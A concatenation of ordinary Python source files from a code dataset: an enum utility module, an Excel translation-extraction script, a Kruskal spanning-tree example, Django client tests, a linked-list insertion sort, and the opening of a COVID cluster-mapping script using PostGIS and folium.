else:\n e = enum\n return e\n\n def __getitem__(cls, key):\n if isinstance(key, Number):\n return list(cls)[int(key)]\n elif isinstance(key, slice):\n # If a Enum is passed convert it to its labelIndex\n start = key.start\n stop = key.stop\n if isinstance(start, Enum):\n start = start.labelIndex\n if isinstance(stop, Enum):\n stop = stop.labelIndex\n return list(cls)[slice(start, stop, key.step)]\n else:\n return getattr(cls, str(key))\n\n def __instancecheck__(cls, inst):\n if type(inst) == cls:\n return True\n if isinstance(inst, cls._cls):\n return True\n return False\n\n def __iter__(cls):\n for e in cls._ENUMERATORS:\n yield e\n\n def __len__(cls):\n return len(cls._ENUMERATORS)\n\n def __repr__(cls):\n return '<{mdl}.{cls}({enums})>'.format(\n mdl=cls._clsDict.get('__module__', 'unknown'),\n cls=cls._clsName,\n enums=cls.join(),\n )\n\n def __str__(cls):\n return '{0}({1})'.format(cls._clsName, cls.join())\n\n\n# =============================================================================\n\n\nclass Enum(with_metaclass(abc.ABCMeta, object)):\n \"\"\"A basic enumerator class.\n\n Enumerators are named values that act as identifiers. 
Typically, a\n list of enumerators are component pieces of an `EnumGroup`.\n\n Example::\n\n class Suit(Enum):\n pass\n\n class Suits(EnumGroup):\n Hearts = Suit()\n Spades = Suit()\n Clubs = Suit()\n Diamonds = Suit()\n\n Enum objects can be combined and compared using binary \"and\" and \"or\"\n operations.\n\n Example::\n\n mySuits = Suits.Hearts | Suits.Spades\n\n if Suits.Hearts & mySuits:\n print(\"This is true!\")\n\n if Suits.Clubs & mySuits:\n print(\"This is false!\")\n\n Attributes:\n name: The name of the enumerator.\n number: The integer value representation of the enumerator.\n label: The enumerator's label.\n labelIndex: The enumerator's index within its parent EnumGroup.\n \"\"\"\n\n _CREATIONORDER = 0\n\n def __init__(self, number=None, label=None, **kwargs):\n \"\"\"Initializes a new Enum object.\n\n In addition to the named arguments listed below, keyword arguments\n may be given that will be set as attributes on the Enum.\n\n Args:\n number(int): The integer representation of the Enum. The default\n is to have this number determined dynamically based on its\n place with the parent EnumGroup.\n label(str): The Enum's label. The default is to inherit the\n attribute name the Enum is associated with in its parent\n EnumGroup.\n \"\"\"\n self._creationOrder = Enum._CREATIONORDER\n Enum._CREATIONORDER += 1\n self._name = None\n self._number = number\n self._label = label\n self._labelIndex = None\n self._cmpLabel = None\n self._cmpName = None\n self._enumGroup = None\n if kwargs:\n self.__dict__.update(kwargs)\n\n @property\n def name(self):\n \"\"\"The name of the Enum.\"\"\"\n return self._name\n\n @property\n def number(self):\n \"\"\"The number representation of the Enum.\"\"\"\n return self._number\n\n @property\n def label(self):\n \"\"\"The Enum's label.\"\"\"\n return self._label\n\n @property\n def labelIndex(self):\n \"\"\"The Enum's index within its parent EnumGroup.\"\"\"\n return self._labelIndex\n\n def _setName(self, name):\n if name is None:\n self._name = None\n self._cmpName = None\n else:\n self._name = name\n self._cmpName = name.strip('_ ')\n\n def _setLabel(self, label):\n if label is None:\n self._label = None\n self._cmpLabel = None\n else:\n self._label = label\n self._cmpLabel = label.replace(' ', '').replace('_', '')\n\n def __add__(self, other):\n return self.__or__(other)\n\n def __and__(self, other):\n if isinstance(other, Enum):\n other = int(other)\n return int(self) & other\n\n def __call__(self):\n return int(self)\n\n def __cmp__(self, value):\n if not isinstance(value, Enum):\n return -1\n return self.number - value.number\n\n def __lt__(self, value):\n return self.__cmp__(value) < 0\n\n def __eq__(self, value):\n if value is None:\n return False\n if isinstance(value, Enum):\n return self.number == value.number\n if isinstance(value, (int, long)):\n return self.number == value\n if isinstance(value, str) or isinstance(value, text):\n if self._compareStr(value):\n return True\n return False\n\n def __hash__(self):\n return self.number\n\n def __index__(self):\n return self.number\n\n def __int__(self):\n return self.number or 0\n\n def __invert__(self):\n return ~int(self)\n\n def __ne__(self, value):\n return not self.__eq__(value)\n\n def __nonzero__(self):\n return bool(int(self))\n\n def __or__(self, other):\n o = other\n if isinstance(other, Enum):\n o = int(other)\n # No need to return a CompositeEnum if one of these is Nothing\n if o == 0:\n return self\n v = int(self)\n if v == 0:\n return other\n value = v | o\n label = '{0} 
{1}'.format(str(self), str(other))\n        name = '{0}_{1}'.format(str(self), str(other))\n\n        class CompositeEnum(Enum):\n            def __init__(ss, number, lbl, name):  # noqa: N805,B902\n                super(CompositeEnum, ss).__init__(number, lbl)\n                ss._name = name\n\n        # Register our composite enum class as a virtual\n        # subclass of this enum's class, plus the same for\n        # the other enum if it's an Enum object. This\n        # will make the composite enum isinstance check true\n        # against both.\n        type(self).register(CompositeEnum)\n        if isinstance(other, Enum):\n            type(other).register(CompositeEnum)\n        return CompositeEnum(value, label, name)\n\n    def __rand__(self, other):\n        if isinstance(other, Enum):\n            other = int(other)\n        return other & int(self)\n\n    def __repr__(self):\n        return '<{mdl}.{cls}.{name}>'.format(\n            mdl=self.__class__.__module__,\n            cls=self.__class__.__name__,\n            name=str(self.name),\n        )\n\n    def __ror__(self, other):\n        return self | other\n\n    def __rxor__(self, other):\n        return self ^ other\n\n    def __str__(self):\n        if self.name:\n            return self.name\n        return self.label or ''\n\n    def __xor__(self, other):\n        if isinstance(other, Enum):\n            other = int(other)\n        return int(self) ^ other\n\n    def _compareStr(self, inStr):\n        return inStr.replace(' ', '').replace('_', '') in (\n            self._cmpLabel,\n            self._cmpName,\n        )\n\n\n# =============================================================================\n\n\nclass EnumGroup(with_metaclass(_MetaEnumGroup, object)):\n    \"\"\"A container class for collecting, organizing, and accessing Enums.\n\n    An EnumGroup class is a container for Enum objects. It provides\n    organizational convenience, and in most cases handles the generation\n    and assignment of Enum numbers, names, and labels.\n\n    Example::\n\n        class Suit(Enum):\n            pass\n\n        class Suits(EnumGroup):\n            Hearts = Suit()\n            Spades = Suit()\n            Clubs = Suit()\n            Diamonds = Suit()\n\n    The above example outlines defining an enumerator, and grouping\n    four of them inside of a group. This provides a number of things,\n    including references by attribute, name, and index. Also provided\n    is an \"All\" attribute; if one is not explicitly assigned, it will be\n    a CompositeEnum of all the defined enums, and compare true against\n    any members of the group via the binary \"and\" operator. Also provided\n    is a \"Nothing\" attribute; if one is not explicitly assigned, it\n    compares false against any members of the group and when converted to\n    an int its value will be zero.\n\n    Example::\n\n        # By attribute.\n        Suits.Hearts\n\n        # By name.\n        Suits['Hearts']\n\n        suitList = list(Suits)\n\n        if Suits.Hearts & Suits.All:\n            print(\"This is true!\")\n\n    You can also pass an int value as an index lookup. If you pass an int value it\n    will return the object by its index. 
This means you cannot look up composite\n    Enum objects, as 3 returns the third index, which in the above example is Diamonds.\n    The index value for Enum is stored on its labelIndex property.\n\n    Example::\n\n        print(Suits.Diamonds.labelIndex)\n\n        if Suits.Diamonds == Suits[3]:\n            print(\"This is true!\")\n\n    An EnumGroup can be sliced by passing an Enum object or its labelIndex value for\n    start and stop, returning a list of matching Enums.\n\n    Example::\n\n        # All Enums between Spades and Diamonds\n        Suits[Suits.Spades:Suits.Diamonds]\n\n        # All Enums between Spades and Clubs including Clubs\n        Suits[Suits.Spades:Suits.Clubs.labelIndex+1]\n\n    An EnumGroup can also act as a factory for composite Enum objects.\n    If a known composite value is available, like 3, which is the\n    combination of enum values 1 and 2, a composite Enum object can\n    be constructed.\n\n    Example::\n\n        comp = Suits(3)\n\n        if Suits.Hearts & comp:\n            print(\"This is true!\")\n\n        if Suits.Clubs & comp:\n            print(\"This is false!\")\n\n    If one of the Enums has the default keyword argument set to True, then that Enum\n    is also exposed as the \"Default\" attribute. Additionally, all other Enums will have\n    a default property added and set to False.\n\n    Example::\n\n        class Suits(EnumGroup):\n            Hearts = Suit()\n            Spades = Suit(default=True)\n\n        assert Suits.Hearts.default == False\n        assert Suits.Spades.default == True\n        assert Suits.Default == Suits.Spades\n\n    Attributes:\n        All: The sum of all members.\n        Nothing: None of the members.\n    \"\"\"\n\n    _ENUMERATORS = None\n    _copyCount = 1\n    All = 0\n    Nothing = 0\n\n    def __init__(self):\n        raise InstantiationError('Unable to instantiate static class EnumGroup.')\n\n    @classmethod\n    def append(cls, *args, **kwargs):\n        \"\"\"Appends additional enumerators to the EnumGroup.\n\n        New members can be provided as ordered arguments where\n        each Enum's label is used to determine the attribute name, or\n        by keyword arguments where the key is the attribute name and\n        the Enum is the value. When using an Enum's label to determine\n        its name, any spaces in the label will be converted to underscores.\n\n        Example:\n            Suits.append(Suit(None, 'Funky'), Foo=Suit())\n\n            # The \"Funky\" and \"Foo\" suits are now available.\n            Suits.Funky\n            Suits.Foo\n\n        Raises:\n            ValueError\n        \"\"\"\n        if [e for e in (list(args) + list(kwargs.values())) if not isinstance(e, Enum)]:\n            raise ValueError('Given items must be of class Enum.')\n        if [e for e in args if not e.label]:\n            raise ValueError('Enums given as ordered arguments must have a label.')\n        for e in args:\n            setattr(cls, cls._labelToVarName(e.label), e)\n        for n, e in iteritems(kwargs):\n            setattr(cls, n, e)\n        # reset All and Nothing -- this is necessary so that All is regenerated\n        # and so that Nothing is not included when finding the member Enums.\n        cls.All = 0\n        cls.Nothing = 0\n        cls.__init_enums__()\n\n    @classmethod\n    def copy(cls, name=None):\n        \"\"\"Returns a new class type from this class without any Enums assigned.\n\n        If name is not provided it will automatically generate a new class name.\n        For example, if the EnumGroup class named DefaultEnums has been copied\n        twice the new class name will be \"DefaultEnums_3\".\n        If you provide name it will not check for duplicates.\n\n        Args:\n            name (str|None): The name to give the new class. 
Defaults to None\n\n Returns:\n EnumGroup: A new Class type.\n \"\"\"\n if not name:\n # Generate a unique name for the class if one was not provided\n name = '{name}_{count}'.format(name=cls.__name__, count=cls._copyCount)\n cls._copyCount += 1\n return type(name, cls.__bases__, dict(cls.__dict__))\n\n @classmethod\n def fromLabel(cls, label, default=None):\n \"\"\"Gets an enumerator based on the given label.\n\n If a default is provided and is not None, that value will be returned\n in the event that the given label does not exist in the EnumGroup. If\n no default is provided, a ValueError is raised.\n\n Args:\n label(str): The label to look up.\n default(*): The default value to return if the label is not found.\n\n Raises:\n ValueError: Raised if default is None and the given label does not\n exist in the EnumGroup.\n\n Returns:\n Enum\n \"\"\"\n label = str(label)\n for e in cls._ENUMERATORS:\n if e.label == label:\n return e\n if default is not None:\n return default\n raise ValueError('No enumerators exist with the given label.')\n\n @classmethod\n def fromValue(cls, value, default=None, allowComposite=False):\n \"\"\"Gets an enumerator based on the given value.\n\n If a default is provided and is not None, that value will be returned\n in the event that the given label does not exist in the EnumGroup. If\n no default is provided, a ValueError is raised.\n\n Args:\n value (int): The value to look up.\n default (*): The default value to return if the label is not found.\n allowComposite (bool, optional): If True a composite enums will be\n created when provided a value that is the sum of multiple enum\n values. Otherwise, a ValueError will be raised. Defaults to\n False.\n\n Returns:\n Enum\n\n Raises:\n ValueError: Raised if default is None and the given label does not\n exist in the EnumGroup.\n \"\"\"\n value = int(value)\n composite = None\n for e in cls._ENUMERATORS:\n eVal = int(e)\n if eVal == value:\n return e\n if allowComposite and eVal & value:\n composite = e if composite is None else (composite | e)\n if composite is not None and int(composite) == value:\n return composite\n if default is not None:\n return default\n raise ValueError('No enumerators exist with the given value.')\n\n @classmethod\n def join(cls, include=None, separator=','):\n \"\"\"Joins all child Enums together into a single string.\n\n The string representation of each Enum is joined using the\n given separator.\n\n Args:\n include(int|Enum): Only enumerators that compare via bitwise \"and\" against\n the given int or Enum will be returned. Default is EnumGroup.All.\n separator(str): The separator to use. 
Default is \",\".\n\n Returns:\n str: The joined enumerators.\n \"\"\"\n include = include is None and cls.All or include\n return str(separator).join(\n [str(e) for e in cls._ENUMERATORS if e & int(include)]\n )\n\n @classmethod\n def labels(cls):\n \"\"\"A generator containing all Enum labels in the EnumGroup.\"\"\"\n return (e.label for e in cls._ENUMERATORS)\n\n @classmethod\n def names(cls):\n \"\"\"A generator containing all Enum names in the EnumGroup.\"\"\"\n return (e.name for e in cls._ENUMERATORS)\n\n @classmethod\n def split(cls, string, separator=','):\n \"\"\"Splits the given string and returns the corresponding Enums.\n\n The string is split using the provided separator, and all names\n contained within must be attributes of the EnumGroup class that\n is performing the split.\n\n Args:\n string(str): The string containing the desired Enum names.\n separator(str): The separator to split on. Default is ','.\n\n Raises:\n AttributeError\n\n Returns:\n list(Enum, ...): The list of resulting Enum objects.\n \"\"\"\n names = str(string).split(str(separator))\n return [getattr(cls, n) for n in names]\n\n @classmethod\n def values(cls):\n \"\"\"A generator containing all Enum values in the EnumGroup.\"\"\"\n return (int(e) for e in cls._ENUMERATORS)\n\n @classmethod\n def __init_enums__(cls):\n enums = []\n default_enum = None\n\n orderedEnums = sorted(\n [\n (k, v)\n for k, v in iteritems(cls.__dict__)\n if isinstance(v, Enum) and k not in ('All', 'Nothing')\n ],\n key=lambda i: i[1]._creationOrder,\n )\n for name, value in orderedEnums:\n enums.append(value)\n value._enumGroup = cls\n value._setName(name)\n if value.label is None:\n value._setLabel(cls._varNameToLabel(name))\n # Check for a default property and raise a error if more than one is found\n if hasattr(value, 'default') and value.default:\n if default_enum is not None:\n raise ValueError(\n (\n '\"{}\" already defines default and \"{}\" is trying to '\n 'claim the default'\n ).format(default_enum, value)\n )\n default_enum = value\n\n enumNumbers = [enum.number for enum in enums if enum.number]\n num = 1\n for enum in enums:\n if enum._number is None:\n while num in enumNumbers:\n num *= 2\n enum._number = num\n enumNumbers.append(num)\n enums.sort()\n labelIndex = 0\n for enum in enums:\n if enum._label is not None:\n enum._labelIndex = labelIndex\n labelIndex += 1\n # Add a default property to all enums for consistency\n if default_enum and not hasattr(enum, 'default'):\n enum.default = False\n cls._ENUMERATORS = enums\n # Build the All object if its not defined\n if isinstance(cls.All, int):\n for e in enums:\n if isinstance(cls.All, int):\n cls.All = e\n else:\n cls.All |= e\n # Build the Nothing object if its not defined\n if isinstance(cls.Nothing, int) and enums:\n processed = set()\n for i, enum in enumerate(enums):\n enumClass = enum.__class__\n if i == 0:\n # Create the Nothing instance from the first class type\n cls.Nothing = enumClass(0, 'Nothing')\n elif enumClass not in processed:\n # Register our Nothing enum's class as a virtual\n # subclass of any additional enum classes. 
This\n                    # will make the Nothing enum isinstance check true\n                    # against all Enums in this EnumGroup.\n                    enumClass.register(cls.Nothing.__class__)\n                    processed.add(enumClass)\n        # If a default was specified, store it on the Default attribute\n        if default_enum and not hasattr(cls, 'Default'):\n            cls.Default = default_enum\n        # Ensure the All and Nothing Enums have a default as well\n        cls.All.default = False\n        if enums:\n            cls.Nothing.default = False\n\n    @classmethod\n    def _varNameToLabel(cls, varName):\n        label = str(varName)\n        label = ' '.join(re.findall('[A-Z]+[^A-Z]*', label))\n        label = re.sub(r'[_\\s]+', ' ', label)\n        return label\n\n    @classmethod\n    def _labelToVarName(cls, label):\n        name = str(label)\n        name = re.sub(r'\\s+', '_', name)\n        return name\n\n\n# =============================================================================\nclass Incrementer(object):\n    \"\"\"A class that behaves similarly to C's i++ or ++i.\n\n    Once you init this class, every time you call it, it will update count and return the\n    previous value like C's i++. If you pass True to pre, it will increment then return\n    the new value like C's ++i.\n\n    Args:\n        start (int): Start the counter at this value. Defaults to zero.\n\n        increment (int): Increment by this value. In most cases it should be 1 or -1.\n            Defaults to one.\n\n        pre (bool): If true calling the object will return the incremented value. If\n            False it will return the current value and increment for the next call.\n            Defaults to False.\n\n    Attributes:\n        count: The current value.\n        increment: The increment added to count.\n        pre: Should it perform a ++i or i++ operation when called.\n    \"\"\"\n\n    def __init__(self, start=0, increment=1, pre=False):\n        super(Incrementer, self).__init__()\n        self.count = start\n        self.increment = increment\n        self.pre = pre\n\n    def __call__(self):\n        if self.pre:\n            self.count += self.increment\n            return self.count\n        ret = self.count\n        self.count += self.increment\n        return ret\n\n    def __repr__(self):\n        return '{}.{}(start={}, increment={}, pre={!r})'.format(\n            self.__module__, type(self).__name__, self.count, self.increment, self.pre\n        )\n\n    def __str__(self):\n        return str(self.count)\n\n\n# =============================================================================\n# EXCEPTIONS\n# =============================================================================\n\n\nclass InstantiationError(Exception):\n    pass\n\n\n# =============================================================================\n","repo_name":"blurstudio/PrEditor","sub_path":"preditor/enum.py","file_name":"enum.py","file_ext":"py","file_size_in_byte":23489,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"5"}
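# Usage sketch (illustrative, not from the repo): Incrementer's post- vs
# pre-increment behavior, mirroring C's i++ and ++i.
#
#     i = Incrementer()           # i++ style: return, then increment
#     assert (i(), i()) == (0, 1)
#     j = Incrementer(pre=True)   # ++i style: increment, then return
#     assert (j(), j()) == (1, 2)
+{"seq_id":"73943284311","text":"import pandas as pd\nimport os\nimport openpyxl\nimport datetime\n\nXLS_COLUMNS = {\n    6: \"Kurzbeschreibung\",\n    7: \"Optionstext\",\n    9: \"Lieferumfang\",\n    10: \"Einleitung\",\n    11: \"Langbeschreibung\",\n    12: \"Ergaenzung-Bullets\",\n    13: \"Weitere-Anmerkungen\",\n    14: \"Weitere-Besonderheiten\",\n    15: \"Achtung\",\n    # 16: \"Variante\",\n    16: \"Hinweis\",\n    17: \"Typ\",\n    18: \"Abmessungen\",\n    # 20: \"Leistung-Leuchtmittel\"\n    }\n\nCURR_PATH = \"e:\\\\Moje dokumenty\\\\SG_scripts_data\\\\Reuter\\\\2023-12-01\\\\\"\nEXPORTS4TRANS = CURR_PATH + \"exports4trans\\\\\"\nEXPORTED_COLUMNS = CURR_PATH + \"4trans_sheets\\\\\"\nTRANSCOLUMNS = list(XLS_COLUMNS.keys())\n\n\ndef extract_strings(worksheet, column_no, row_limit):\n    prev_time = datetime.datetime.now()\n    curr_row = 2\n    DE_strings = 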
pd.DataFrame(columns=[\"datenart\", \"sprache\", \"produktno\", \"navisionid\", \"text\"])\n PL_strings = pd.DataFrame(columns=[\"datenart\", \"sprache\", \"produktno\", \"navisionid\", \"text\"])\n while curr_row < row_limit:\n if worksheet.cell(row=curr_row, column=2).value == \"deu\" and \\\n worksheet.cell(row=curr_row, column=column_no).value is not None:\n source_datenart = worksheet.cell(row=curr_row, column=1).value\n source_sprache = worksheet.cell(row=curr_row, column=2).value\n source_produktno = worksheet.cell(row=curr_row, column=3).value\n source_navisionid = worksheet.cell(row=curr_row, column=4).value\n source_text = worksheet.cell(row=curr_row, column=column_no).value\n \n data = {\"datenart\": [source_datenart],\n \"sprache\": [source_sprache],\n \"produktno\": [source_produktno],\n \"navisionid\": [source_navisionid],\n \"text\": [source_text]}\n \n new_row = pd.DataFrame(data)\n DE_strings = pd.concat([DE_strings, new_row], ignore_index=True)\n \n elif worksheet.cell(row=curr_row, column=2).value == \"pol\" and \\\n worksheet.cell(row=curr_row, column=column_no).value is None:\n target_datenart = worksheet.cell(row=curr_row, column=1).value\n target_sprache = worksheet.cell(row=curr_row, column=2).value\n target_produktno = worksheet.cell(row=curr_row, column=3).value\n target_navisionid = worksheet.cell(row=curr_row, column=4).value\n target_text = worksheet.cell(row=curr_row, column=column_no).value\n\n \n data = {\"datenart\": [target_datenart],\n \"sprache\": [target_sprache],\n \"produktno\": [target_produktno],\n \"navisionid\": [target_navisionid],\n \"text\": [target_text]}\n \n new_row = pd.DataFrame(data)\n PL_strings = pd.concat([PL_strings, new_row], ignore_index=True)\n \n else:\n pass\n curr_row += 1\n if curr_row % 5000 == 0:\n curr_time = datetime.datetime.now()\n time_delta = curr_time - prev_time\n print(f\"Column: {XLS_COLUMNS[column_no]}, Progress: {curr_row}/{row_limit}, Time: {curr_time}, Delta: {time_delta}\")\n prev_time = curr_time\n\n DE_strings_unique = DE_strings.drop_duplicates(keep=\"first\")\n PL_strings_unique = PL_strings.drop_duplicates(keep=\"first\")\n return DE_strings_unique, PL_strings_unique\n\ndef select_untranslated(DE_strings, PL_strings):\n strings_no_PL = pd.DataFrame(columns=[\"datenart\", \"sprache\", \"produktno\", \"navisionid\", \"text\"])\n for index, row in DE_strings.iterrows():\n if row[\"datenart\"] in PL_strings[\"datenart\"].values and \\\n row[\"produktno\"] in PL_strings[\"produktno\"].values and \\\n row[\"navisionid\"] in PL_strings[\"navisionid\"].values:\n DE_string = pd.DataFrame(row).transpose()\n strings_no_PL = pd.concat([strings_no_PL, DE_string], ignore_index=True, axis = 0)\n return strings_no_PL\n\ndef select_strings4trans(strings_no_PL):\n strings4trans = pd.DataFrame(columns=['DE', 'PL'])\n strings4trans[\"DE\"] = strings_no_PL[\"text\"]\n strings4trans[\"PL\"] = \"\"\n strings4trans_unique = strings4trans.drop_duplicates(keep=\"first\")\n return strings4trans_unique\n\ndef find_untrans(files4trans_path, columns):\n '''\n Provide the path to the directory\n with xlsx exports for trans.\n Source cells that require translation\n will be exported\n '''\n\n for file in dir_list: # get all untranslated entries and build separate workbook\n file4trans_path = files4trans_path + file\n wb = openpyxl.load_workbook(file4trans_path)\n \n for tab in wb.sheetnames: #for each worksheet in a workbook\n ws = wb[tab]\n row_limit = ws.max_row+1\n print(f\"Number of rows: {row_limit} \\nCurrent sheet: {ws} \\nCurrent 
tab: {tab}\")\n \n # verify the names/number of columns in the spreadsheet\n list_with_values=[]\n for cell in ws[1]:\n list_with_values.append(cell.value)\n print(f\"Columns in {tab} tab: {list_with_values}\")\n print(f\"Columns no in {tab} tab: {len(list_with_values)}\")\n \n for transcolumn in columns:\n DE_strings, PL_strings = extract_strings(ws, transcolumn, row_limit)\n strings_no_PL = select_untranslated(DE_strings, PL_strings)\n strings4trans = select_strings4trans(strings_no_PL)\n print(f\"Tab: {tab}, Column: {XLS_COLUMNS[transcolumn]}, unique dataframe head: {strings4trans.head()}\")\n print(f\"Unique dataframe shape: {strings4trans.shape}\")\n \n # save the dataframe to excel\n if strings4trans.shape[0] == 0:\n pass\n else:\n file_path = EXPORTED_COLUMNS + file[:-5] + \"-\" + tab + \"-\" + \"COL\" + \"-\" + str(XLS_COLUMNS[transcolumn]) + \"_unique.xlsx\"\n with pd.ExcelWriter(file_path, engine='openpyxl') as writer:\n strings4trans.to_excel(writer, sheet_name=str(XLS_COLUMNS[transcolumn]), index=False)\n \n\ndir_list = os.listdir(EXPORTS4TRANS) \nif os.path.exists(EXPORTS4TRANS):\n print(f\"Folder {EXPORTS4TRANS} exist.\")\n print(f\"dir_list= {dir_list}\")\n find_untrans(EXPORTS4TRANS, TRANSCOLUMNS)\nelse:\n print(f\"Folder {EXPORTS4TRANS} does not exist.\")\n\n","repo_name":"darstar-ds/SG_scripts","sub_path":"Reuter/find_untrans_split.py","file_name":"find_untrans_split.py","file_ext":"py","file_size_in_byte":6408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"5728116797","text":"from networkx.exception import NetworkXNoCycle\nimport networkx as nx\n\nG=nx.Graph() #Create a Graph\n\n#Graph taken from Geeks for Geeks\nconnections = [(0, 1, 4), (0, 7, 8), (1, 7, 11),\n (1, 2, 8), (2, 8, 2), (7, 8, 7), \n (7, 6, 1), (8, 6, 6), (2, 5, 4), \n (6, 5, 2), (2, 3, 7), (3, 5, 14),\n (3, 4, 9), (5, 4, 10), ]\n\nG.add_weighted_edges_from(connections)\ncount=G.number_of_nodes()\nstart=0\nnew_G=nx.Graph()\nc=0\nconnections=sorted(connections,key=lambda tup: tup[2])\n\nwhile c!=count-1:\n\n try:\n edge = [connections[start]]\n new_G.add_weighted_edges_from(edge)\n nx.find_cycle(new_G)\n \n except NetworkXNoCycle:\n c+=1\n \n else:\n new_G.remove_edge(edge[0][0],edge[0][1])\n \n start+=1\n\nprint(new_G.edges)\n","repo_name":"Nirmal-Gopi-R/SDEproblems","sub_path":"greedy/kruskal.py","file_name":"kruskal.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31755671886","text":"\"\"\"Tests for the middlewares of the influxdb_metrics app.\"\"\"\nfrom django.test import TestCase\n\nfrom beagle.client import get_client, NullReporter\n\n\nclass ClientTestCase(TestCase):\n \"\"\"Tests for the ``client`` model.\"\"\"\n\n def test_get_without_api_key(self):\n with self.settings(DATADOG_API_KEY=None):\n client = get_client()\n self.assertIsInstance(client.reporter, NullReporter)\n self.assertTrue(client._disabled)\n\n def test_get_with_api_key(self):\n with self.settings(DATADOG_API_KEY='fdsjkfdshfds'):\n client = get_client()\n self.assertNotIsInstance(client.reporter, NullReporter)\n self.assertFalse(client._disabled)\n","repo_name":"marcusmartins/django-beagle","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"31197547899","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 
-*-\n\"\"\"\nCreated on Sun Jun 6 23:30:33 2021\n\n@author: radhakrishna\n\"\"\"\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def adjust(self,head:ListNode)->ListNode:\n dh=ListNode()\n dh.next=head\n #insert in the starting so that it can be adjusted towards end.\n #left to right flow.\n #inserted value in starting. check if next node is smaller than this node etc.\n \n current=head\n prev=dh\n #print(dh)\n while(current and current.next):\n #print(dh)\n if(current.val>current.next.val):\n prev.next=current.next\n prev=current.next\n #print(prev.val)\n nex=current.next.next\n current.next.next=current\n current.next=nex\n \n else:\n break\n #print(dh.next)\n return dh.next\n \n def insertionSortList(self, head: ListNode) -> ListNode:\n \n dh=ListNode(head.val)\n dh.next=None\n \n \n if(not head or not head.next):\n return head\n else:\n \n current=head.next\n \n c=0\n while(current):\n #print(current.val)\n #print(dh)\n d=current.next\n current.next=dh\n dh=self.adjust(current)\n current=d\n return dh\n \n ","repo_name":"kssvrk/dsalgos","sub_path":"leetcode/linked_list/insertion_sort_linked_list_147.py","file_name":"insertion_sort_linked_list_147.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2779984303","text":"#GEOCOVID-mstdbscanMap.py\nimport json\nfrom pandas import json_normalize\nimport folium\nimport geopandas as gpd\nimport numpy as np\nimport pandas as pd\nimport os\nimport math\nimport getpass\nfrom sqlalchemy import create_engine\nimport psycopg2 as ps\nfrom folium.plugins import TimestampedGeoJson\nimport calendar\nfrom datetime import date\nfrom shapely.geometry import mapping\nimport branca.colormap as cm\nfrom folium.plugins import FloatImage\nfrom folium import IFrame\nimport base64\n\noutdir='outputs/COVID_MSTDBSCAN/ByDays_1km/'\nresdir='supplementary_materials_paper/supp_mat_6/'\n\n#Open clusterGDF file\ndata=gpd.read_file(outdir+'clusterGDF.gpkg',driver='GPKG')\n#Convert to lat/lon\ndata=data.to_crs({'init': 'epsg:4326'})\n\n#Open diffusionZones\nzones=gpd.read_file(outdir+'diffusionZones.gpkg',driver='GPKG')\n#Convert to lat/lon\nzones=zones.to_crs({'init': 'epsg:4326'})\n\n\n#Convert to_datetime\ndata['mstDate']=pd.to_datetime(data.mstDate,format='%Y-%m-%d')\n\n#CONNECT TO DB WITH user=aladoy\npw=getpass.getpass() #Ask for user password\nengine=create_engine(\"postgresql+psycopg2://aladoy:{}@localhost/geocovid\".format(pw)) #Create SQLAlchemy engine\nconn=ps.connect(\"dbname='geocovid' user='aladoy' host='localhost' password='{}'\".format(pw)) #Create a connection object\ncursor=conn.cursor() #Create a cursor object\n\n\n#TESTS / CASES\ntests=gpd.read_postgis(\"SELECT id_demande, date_reception, charge_virale, ST_X(ST_TRANSFORM(geometry,4326)) AS lon, ST_Y(ST_TRANSFORM(geometry, 4326)) AS lat, geometry FROM covid_tests_vd WHERE res_cov=0\",conn,geom_col='geometry')\ncases=gpd.read_postgis(\"SELECT id_demande, date_reception, charge_virale, ST_X(ST_TRANSFORM(geometry,4326)) AS lon, ST_Y(ST_TRANSFORM(geometry, 4326)) AS lat, geometry FROM covid_tests_vd WHERE res_cov=1\",conn,geom_col='geometry')\n\n\n#Extract Lat/Lon corresponding to the center of the canton\ncursor.execute(\"SELECT ST_X(ST_Transform(ST_Centroid(ST_Union(geometry)),4326)) FROM cantons WHERE name='Vaud'\")\nx=cursor.fetchone()[0]\ncursor.execute(\"SELECT 
ST_Y(ST_Transform(ST_Centroid(ST_Union(geometry)),4326)) FROM cantons WHERE name='Vaud'\")\ny=cursor.fetchone()[0]\nprint(x,y)\n\n#Create dic for colors\ncolors={'Emerge':'#fb9a99','Growth':\"#e31a1c\", 'Steady':\"#33a02c\", 'Merge':\"#ffffb3\", 'Move':\"#fdb462\", 'Split':\"#bebada\", 'Reduction':\"#1f78b4\"}\ndata['colorHEX'] = data['type'].map(colors)\n\ndef create_geojson_features(df):\n features = []\n for idx, row in df.iterrows():\n feature = {\n 'type': 'Feature',\n 'geometry': {\n 'type':'Polygon',\n 'coordinates':mapping(df.loc[idx].geometry)['coordinates']\n },\n 'properties': {\n 'time': pd.to_datetime(row['mstDate'], unit='D').__str__(),\n 'style': {'color' : row['colorHEX'], 'opacity':0.7, 'fillOpacity':0.7},\n 'popup': 'Cluster ID: ' + str(row['clusterID']) + '
